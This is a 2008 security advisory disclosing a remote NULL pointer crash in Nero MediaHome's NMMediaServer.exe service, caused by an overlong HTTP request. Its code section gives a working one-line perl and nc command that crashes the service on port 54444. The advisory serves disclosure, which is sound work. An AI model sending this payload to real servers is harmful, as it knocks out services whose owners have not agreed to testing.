####################################################################### Luigi Auriemma Application: Nero http://www.nero.com Versions: <= 8.3.2.1 (Nero MediaHome <= 3.3.3.0) Platforms: Windows Bug: NULL pointer in Nero MediaHome Exploitation: remote Date: 12 Apr 2008 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Nero MediaHome is a media server which is part of the Nero suite. ####################################################################### ====== 2) Bug ====== The NMMediaServer.exe service is vulnerable to a crash caused by a NULL pointer vulnerability exploitable through the sending of a HTTP request longer than 3076 bytes (a minimum of 4 bytes plus the limit of 3072 bytes used by the program). ####################################################################### =========== 3) The Code =========== perl -e 'print "a"x3077' | nc SERVER 54444 -v -v ####################################################################### ====== 4) Fix ====== No fix #######################################################################